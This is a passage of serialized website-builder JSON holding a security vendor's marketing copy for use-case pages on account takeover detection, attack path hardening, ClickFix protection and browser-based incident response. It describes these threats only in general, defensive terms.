can’t","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb4dd9db24bc9495b8a686b1b4d492016%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=b4dd9db24bc9495b8a686b1b4d492016&alt=media&optimized=true",{"large":494},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":496,"meta":497,"component":498,"responsiveStyles":500},"builder-0bc0d1c78ece4994993c3a6427a4d533",{"previousId":242},{"name":244,"options":499,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":501},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":503,"meta":504,"component":505,"responsiveStyles":507},"builder-e45de8f3768c4f16938dbf78e4e87524",{"previousId":251},{"name":253,"options":506,"isRSC":118},{"darkMode":246},{"large":508},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":510,"component":511,"responsiveStyles":516},"builder-c98e8bfd341146c1b67c02d5698ff093",{"name":258,"tag":258,"options":512,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":513,"description":514,"image":515,"reverse":6},"\u003Ch2>Assume less. See more.\u003C/h2>","\u003Cp>Most account takeovers don’t start with a breach, they start with a login. Whether it’s a reused password, a local account, or an outdated login flow, Push shows you how accounts are actually accessed day to day, not just how policies say they should be. 
That means no more blind spots around ghost logins, bypassed SSO, or stale access paths that quietly persist.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F18630ad2746d4eb7b7fcc0428b11a8f0",{"large":517},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":519,"meta":520,"component":521,"responsiveStyles":526},"builder-55c1fc38ddc04fd1a0d6a8e2fb819e00",{"previousId":270},{"name":272,"options":522,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":523,"description":524,"reverse":246,"image":525},"\u003Ch2>Catch stolen credential use in real time\u003C/h2>","\u003Cp>Push monitors login activity directly in the browser to detect signs of credential-based attacks like leaked password use or suspicious login flows. By analyzing attacker TTPs instead of relying on known indicators, Push spots credential stuffing and account takeover attempts the moment they begin, not after they’ve succeeded.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F52b0123cac2c4dfdb1dc0af6adf9d603",{"large":527},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":529,"meta":530,"component":531,"responsiveStyles":536},"builder-dfb31737b30948c6b95323655d571a50",{"previousId":285},{"name":272,"options":532,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":533,"description":534,"reverse":6,"image":535},"\u003Ch2>Detect session hijacks and stealth access\u003C/h2>","\u003Cp>Attackers don’t always need a login screen, they often sidestep it entirely using stolen session tokens. 
Push detects when valid sessions are reused in unexpected ways, identifying hijacked sessions and stealth access attempts that traditional tools miss. Because we monitor directly in the browser, you see what’s happening inside active sessions in real time.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F94a6859a99e04d309ffe5841f3dbdf5c",{"large":537},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":539,"meta":540,"component":541,"responsiveStyles":546},"builder-f7585b90eb974d03a7dc7eae5b58d227",{"previousId":296},{"name":272,"options":542,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":543,"description":544,"reverse":246,"image":545},"\u003Ch2>Harden accounts before they’re compromised\u003C/h2>","\u003Cp>Push goes beyond alerts. It identifies apps that still allow local logins, even when SSO is configured, so you can remove weak access paths. 
Push also flags users without MFA, reused work credentials, or weak passwords, and prompts users in-browser to fix risky behaviors before they’re exploited.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01c1b638f1b6497093a4f2b8ceddb5bb",{"large":547},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":549,"meta":550,"component":551,"responsiveStyles":553},"builder-ad81d1e3afec49a791214194eae09bdc",{"previousId":307},{"name":253,"options":552,"isRSC":118},{"darkMode":6},{"large":554},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":556,"component":557,"responsiveStyles":559},"builder-8dac1aa4b9d148628d92252bd8eff822",{"name":315,"tag":315,"options":558,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":560},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":562,"@type":106,"tagName":131,"properties":563,"responsiveStyles":564},"builder-pixel-5ymnk0pwz0x",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":565},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":567},{"path":31,"query":568},{},{},1770892814499,1745499162732,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F58b660fa94aa4b30b0faeb9b663ae41a",[],{"lastPreviewUrl":575,"hasLinks":6,"originalContentId":157,"breakpoints":576,"winningTest":118,"kind":337,"hasAutosaves":6},"https://pushsecurity.com/uc/account-takeover-detection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexD
esignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.94bebb7bb99d48629ad157e80cf4d81d=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.use-case-page:/uc/account-takeover-detection=94bebb7bb99d48629ad157e80cf4d81d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":578,"id":579,"name":580,"modelId":159,"published":13,"query":581,"data":584,"variations":687,"lastUpdated":688,"firstPublished":689,"testRatio":42,"screenshot":690,"createdBy":43,"lastUpdatedBy":332,"folders":691,"meta":692,"rev":339},1745009370904,"23eb48fb56d3451cab77cb6ed140ee6d","Attack path hardening",[582],{"@type":162,"property":163,"operator":164,"value":583},"/uc/attack-path-hardening",{"tsCode":31,"seoDescription":585,"jsCode":31,"customFonts":586,"fontAwesomeIcon":591,"seoTitle":580,"title":580,"blocks":592,"url":583,"state":684},"Harden access paths with visibility, detection, and 
guardrails.",[587],{"kind":174,"files":588,"version":172,"lastModified":173,"subsets":589,"menu":197,"category":198,"variants":590,"family":178},{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"regular":210,"italic":216,"800italic":215,"500italic":209,"600italic":217,"200italic":212,"900italic":208,"700italic":213,"100italic":211,"300italic":214},[176,177],[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],"faRadar",[593,679],{"@type":106,"@version":107,"tagName":221,"id":594,"meta":595,"children":596},"builder-1d8553eddcaa44d7bba9e2f4ca13af2a",{"previousId":476},[597,613,620,627,636,646,656,666,673],{"@type":106,"@version":107,"id":598,"meta":599,"component":600,"responsiveStyles":611},"builder-84fe3d7c85a743cf8cef649aa974f1ef",{"previousId":480},{"name":225,"options":601,"isRSC":118},{"title":580,"description":602,"points":603,"video":610},"\u003Cp>Push continuously monitors your environment for exposed login paths, weak credentials, and missing protections like MFA. 
It detects the gaps attackers exploit and helps you close them before they’re used.\u003C/p>",[604,606,608],{"item":605},"Find weak spots like reused passwords, local logins, and missing MFA",{"item":607},"Monitor how users actually log in across apps, flows, and tools",{"item":609},"Enforce secure access with in-browser guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fdbdcf52892034f1bbddded77f753a343%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=dbdcf52892034f1bbddded77f753a343&alt=media&optimized=true",{"large":612},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":614,"meta":615,"component":616,"responsiveStyles":618},"builder-b3f66f5b08054cc78a06fecfc3ae2337",{"previousId":496},{"name":244,"options":617,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":619},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":621,"meta":622,"component":623,"responsiveStyles":625},"builder-4c73418b84be49ed85e6e13d2625c5a0",{"previousId":503},{"name":253,"options":624,"isRSC":118},{"darkMode":246},{"large":626},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":628,"component":629,"responsiveStyles":634},"builder-dec0246085e1485c803f7152b1922a81",{"name":258,"tag":258,"options":630,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":631,"description":632,"image":633,"reverse":6},"\u003Ch2>Find the gaps that lead to compromise\u003C/h2>","\u003Cp>Misconfigurations don’t show up in your config files, they show up in how users actually access apps. 
Push monitors real login behavior in the browser, surfacing risky patterns like local login access, duplicate accounts, or missing protections that leave doors wide open.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F309a59bba8d247a19476bb369397460e",{"large":635},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":637,"meta":638,"component":639,"responsiveStyles":644},"builder-ebf049a645604a249550996a88f8f3b6",{"previousId":519},{"name":272,"options":640,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":641,"description":642,"reverse":246,"image":643},"\u003Ch2>See real login behavior\u003C/h2>","\u003Cp>Push watches authentication flows as they happen, giving you a live view of how users log in, which methods they choose, and where protections like MFA are missing. Plus, uncover every app and account in use, even shadow IT you didn’t know existed, without relying on stale config files or IdP assumptions. \u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb51f6b0357cc451b87a7a5016d984e5e",{"large":645},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},{"@type":106,"@version":107,"id":647,"meta":648,"component":649,"responsiveStyles":654},"builder-431d175c59004669b0b2776b07d71737",{"previousId":529},{"name":272,"options":650,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":651,"description":652,"reverse":6,"image":653},"\u003Ch2>Find and fix posture drift\u003C/h2>","\u003Cp>Security posture isn’t static. Push continuously monitors for issues like missing MFA or legacy login methods. 
When something falls out of policy, you know immediately with custom notifications so you can act before it turns into risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F324e39127dfc41e592b1183dfb39892d",{"large":655},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":657,"meta":658,"component":659,"responsiveStyles":664},"builder-3dffdcbe0a484e2ca4c03f019b6d40ee",{"previousId":539},{"name":272,"options":660,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":661,"description":662,"reverse":246,"image":663},"\u003Ch2>Guide users with in-browser guardrails\u003C/h2>","\u003Cp>Push doesn’t just surface problems, it helps you fix them. When users sign in without MFA, reuse a password, or use insecure credentials, Push prompts them directly in the browser to secure their access. It’s faster, more effective, and actually gets 
results.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fee8b75d13e45488aba55434a8b49ebb0",{"large":665},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":667,"meta":668,"component":669,"responsiveStyles":671},"builder-976bc222cd7647ff905f1e01cfedc453",{"previousId":549},{"name":253,"options":670,"isRSC":118},{"darkMode":6},{"large":672},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":674,"component":675,"responsiveStyles":677},"builder-8c47ec2fd0f74382bb3e6c870555632c",{"name":315,"tag":315,"options":676,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":678},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":680,"@type":106,"tagName":131,"properties":681,"responsiveStyles":682},"builder-pixel-c2dfvzybt4s",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":683},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":685},{"path":31,"query":686},{},{},1770892844854,1745499166112,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6ca12bf728a045f1a31d40c0beb3bfe5",[],{"kind":337,"lastPreviewUrl":693,"breakpoints":694,"hasLinks":6,"originalContentId":461,"winningTest":118,"hasAutosaves":6},"https://pushsecurity.com/uc/attack-path-hardening?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&buil
der.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.23eb48fb56d3451cab77cb6ed140ee6d=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.use-case-page:/uc/attack-path-hardening=23eb48fb56d3451cab77cb6ed140ee6d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":696,"id":697,"name":698,"modelId":159,"published":13,"query":699,"data":702,"variations":807,"lastUpdated":808,"firstPublished":809,"testRatio":42,"screenshot":810,"createdBy":43,"lastUpdatedBy":332,"folders":811,"meta":812,"rev":339},1761675020232,"ea4f309d2ffe46c5aa97ebf0fda4e2e3","ClickFix Protection",[700],{"@type":162,"property":163,"operator":164,"value":701},"/uc/clickfix-protection",{"seoDescription":703,"fontAwesomeIcon":704,"customFonts":705,"seoTitle":710,"jsCode":31,"tsCode":31,"title":710,"blocks":711,"url":701,"state":804},"Block attacks that trick users into running malicious code.","faLaptopCode",[706],{"files":707,"subsets":708,"menu":197,"version":172,"kind":174,"family":178,"lastModified":173,"variants":709,"category":198},{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"200italic":212,"800italic":215,"700italic":213,"600italic":217,"100italic":211,"italic":216,"regular":210,"300italic":214,"500italic":209,"900italic":208},[176,177],[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],"ClickFix 
protection",[712,799],{"@type":106,"@version":107,"tagName":221,"id":713,"meta":714,"children":715},"builder-d7eefdde0f2a4b2b9de3dcb2978fd6cb",{"previousId":594},[716,732,739,746,756,766,776,786,793],{"@type":106,"@version":107,"id":717,"meta":718,"component":719,"responsiveStyles":730},"builder-56e2c54bcce040a4af8b92ae03706c12",{"previousId":598},{"name":225,"options":720,"isRSC":118},{"title":710,"description":721,"points":722,"image":729},"\u003Cp>ClickFix attacks are one of the fastest-growing threats, tricking users into copying malicious code from a webpage and running it locally. This technique bypasses traditional EDR, email gateways, and network filters, leading directly to ransomware and data theft. Push stops this attack at the source, in the browser, by detecting and blocking the malicious behavior before the user can ever paste the code.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[723,725,727],{"item":724},"Detect ClickFix, FileFix, and fake CAPTCHA in the browser",{"item":726},"Block malicious copy-and-paste actions before code is executed",{"item":728},"See full telemetry into which users were targeted and what they 
saw","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b74af62889847ebb3927364485b0546",{"large":731},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":733,"meta":734,"component":735,"responsiveStyles":737},"builder-05f9614d4e3e4dc88b3ee8658f54e10e",{"previousId":614},{"name":244,"options":736,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":738},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":740,"meta":741,"component":742,"responsiveStyles":744},"builder-c4fb5179366243c1b6c32d368675cf47",{"previousId":621},{"name":253,"options":743,"isRSC":118},{"darkMode":246},{"large":745},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":747,"meta":748,"component":749,"responsiveStyles":754},"builder-261af50705fd445d8cca4a6ba20d5391",{"previousId":628},{"name":258,"tag":258,"options":750,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":751,"description":752,"reverse":6,"image":753},"\u003Ch2>Stop ClickFix-style attacks before they become a breach\u003C/h2>","\u003Cp>Traditional security tools are blind to malicious copy and paste attacks because the attack exploits a gap between the browser and the endpoint. 
EDR only sees the payload after it runs, and network tools see only part of the picture.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F98b2f7e08dec4eafaf8e24937605b8cf",{"large":755},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":757,"meta":758,"component":759,"responsiveStyles":764},"builder-7d21b8aab8064c40b1e5dd23c4749309",{"previousId":637},{"name":272,"options":760,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":761,"description":762,"reverse":246,"image":763},"\u003Ch2>Discover lures at the source\u003C/h2>","\u003Cp>Push inspects page behavior to identify ClickFix attacks as they happen. By inspecting the page, its structure, and how the user interacts with it, Push can detect and block these in-browser threats in real time. This deep, TTP-based inspection spots the trap even on novel pages that are built to bypass traditional web filters and blocklists.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F665bf47e01544c75bf9ddafd3917927b",{"large":765},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},{"@type":106,"@version":107,"id":767,"meta":768,"component":769,"responsiveStyles":774},"builder-fb91943adf6149259ed9e1e6566c9afe",{"previousId":647},{"name":272,"options":770,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":771,"description":772,"reverse":6,"image":773},"\u003Ch2>Block the malicious action\u003C/h2>","\u003Cp>When Push detects a malicious script, it intercepts the user's action and blocks the code from being copied to the clipboard. The user is protected, the attack is stopped, and no malicious code ever reaches the endpoint. 
Unlike broad DLP tools, this action is surgical, targeting only malicious behavior without disrupting normal work.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F5ee68f81f1ac416685cbfe91298cf827",{"large":775},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":777,"meta":778,"component":779,"responsiveStyles":784},"builder-bfac95fada864e5a8259b955b5b5f98b",{"previousId":657},{"name":272,"options":780,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":781,"description":782,"reverse":246,"image":783},"\u003Ch2>Accelerate ClickFix investigations\u003C/h2>","\u003Cp>When an attack happens, knowing what the user saw or did is critical. Push provides rich browser session data for rapid investigation and containment. Security teams get detailed telemetry on which users were targeted, what lure they were served, and when the block occurred. 
This enables defenders to reconstruct what happened and respond quickly, even when other tools miss the activity entirely.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6cdf2a8aeddc4e9a9023cbf974e40239",{"large":785},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":787,"meta":788,"component":789,"responsiveStyles":791},"builder-136892e831684a6987f87d3be67c33d1",{"previousId":667},{"name":253,"options":790,"isRSC":118},{"darkMode":6},{"large":792},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":794,"component":795,"responsiveStyles":797},"builder-dec26b739f2f42beb5a73cfc6c675b60",{"name":315,"tag":315,"options":796,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":798},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":800,"@type":106,"tagName":131,"properties":801,"responsiveStyles":802},"builder-pixel-koxe7grww2l",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":803},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":805},{"path":31,"query":806},{},{},1770892881888,1761847585203,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F375467b8bef34ed1a8a1cc5b8b67d75f",[],{"lastPreviewUrl":813,"originalContentId":579,"winningTest":118,"hasLinks":6,"kind":337,"breakpoints":814,"hasAutosaves":6},"https://pushsecurity.com/uc/clickfix-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.u
ser.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.ea4f309d2ffe46c5aa97ebf0fda4e2e3=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.use-case-page:/uc/clickfix-protection=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":816,"id":817,"name":818,"modelId":159,"published":13,"query":819,"data":822,"variations":927,"lastUpdated":928,"firstPublished":929,"testRatio":42,"screenshot":930,"createdBy":43,"lastUpdatedBy":332,"folders":931,"meta":932,"rev":339},1745009743870,"a9d5556e77f84a37b5bd52310a7110c1","Incident response",[820],{"@type":162,"property":163,"operator":164,"value":821},"/uc/incident-response",{"seoDescription":823,"customFonts":824,"title":818,"jsCode":31,"fontAwesomeIcon":829,"seoTitle":830,"tsCode":31,"blocks":831,"url":821,"state":924},"Investigate and respond faster with unique browser telemetry.",[825],{"kind":174,"subsets":826,"menu":197,"variants":827,"category":198,"family":178,"version":172,"lastModified":173,"files":828},[176,177],[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"900italic":208,"600italic":217,"200italic":212,"300italic":214,"100italic":211,"700italic":213,"800italic":215,"regular":210,"italic":216,"500italic":209},"faSatelliteDish","Browser-based incident 
response",[832,919],{"@type":106,"@version":107,"tagName":221,"id":833,"meta":834,"children":835},"builder-653c4aed737b4def88dc4cd2d695660a",{"previousId":594},[836,853,860,867,876,886,896,906,913],{"@type":106,"@version":107,"id":837,"meta":838,"component":839,"responsiveStyles":851},"builder-18190bd36518467d9154d27d7e945b9b",{"previousId":598},{"name":225,"options":840,"isRSC":118},{"title":841,"description":842,"points":843,"video":850},"Browser-based incident response","\u003Cp>Push gives you real-time visibility into what actually happened during a breach, right in the browser where the attack played out. From credential theft to session hijacking, Push captures high-fidelity telemetry so you can investigate quickly, contain confidently, and shut it down before it spreads.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[844,846,848],{"item":845},"Reconstruct what happened with real browser session context",{"item":847},"Investigate faster with real-world session context",{"item":849},"Trigger response actions automatically through your SIEM or 
SOAR","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd00e39d3b6e346c296261d875cf55652%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=d00e39d3b6e346c296261d875cf55652&alt=media&optimized=true",{"large":852},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":854,"meta":855,"component":856,"responsiveStyles":858},"builder-8a0a8ea63f5d48dd8a6726f2d49cf0ca",{"previousId":614},{"name":244,"options":857,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":859},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":861,"meta":862,"component":863,"responsiveStyles":865},"builder-2df65c3f54334df2b26e7cb744886cdc",{"previousId":621},{"name":253,"options":864,"isRSC":118},{"darkMode":246},{"large":866},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":868,"component":869,"responsiveStyles":874},"builder-2c32c869efc2423ab69ef06b150e9f97",{"name":258,"tag":258,"options":870,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":871,"description":872,"image":873,"reverse":6},"\u003Ch2>See attacks unfold, not just their aftermath\u003C/h2>","\u003Cp>Attacks happen in the browser, not in logs. Push captures what traditional tools miss: what users clicked, what loaded, what was entered, and how attackers moved. 
That gives you real-world evidence, not just assumptions, when every second matters.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F36fc719bd1de4a38b916f4d25c81a26d",{"large":875},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":877,"meta":878,"component":879,"responsiveStyles":884},"builder-370e53c6016e432db01e9193a2ce90f6",{"previousId":637},{"name":272,"options":880,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":881,"description":882,"reverse":246,"image":883},"\u003Ch2>Investigate faster with high-fidelity data\u003C/h2>","\u003Cp>Reconstructing an incident shouldn’t feel like guesswork. Push records detailed telemetry from inside the browser: page loads, credential inputs, DOM changes, session activity, user behavior. It’s structured, exportable, and ready to plug into your investigation workflows, so you can move fast without digging through proxy logs or relying on user reports.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa6adda040e684e67a8d68a55c5ce5f6d",{"large":885},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":887,"meta":888,"component":889,"responsiveStyles":894},"builder-a7f3767a8d184bd08fb24520bf210e95",{"previousId":647},{"name":272,"options":890,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":891,"description":892,"reverse":6,"image":893},"\u003Ch2>Contain and respond in real time\u003C/h2>","\u003Cp>When something looks off, Push doesn’t just alert you, it gives you options. Guide users with in-browser prompts. Terminate sessions. Trigger SOAR workflows. Enrich SIEM alerts. 
Push gives you the context and control to stop spread before it starts.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb3dedeed5aba4847a2c2d22e10d0ec12",{"large":895},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":897,"meta":898,"component":899,"responsiveStyles":904},"builder-b92036ee0ece4b32acdbdcc7c377366b",{"previousId":657},{"name":272,"options":900,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":901,"description":902,"reverse":246,"image":903},"\u003Ch2>Prevent the next one\u003C/h2>","\u003Cp>Push helps you respond fast, but it also helps you fix what went wrong. It surfaces misconfigurations and risky behaviors that made the attack possible in the first place, then guides users in-browser to remediate. One tool. Full loop. No loose 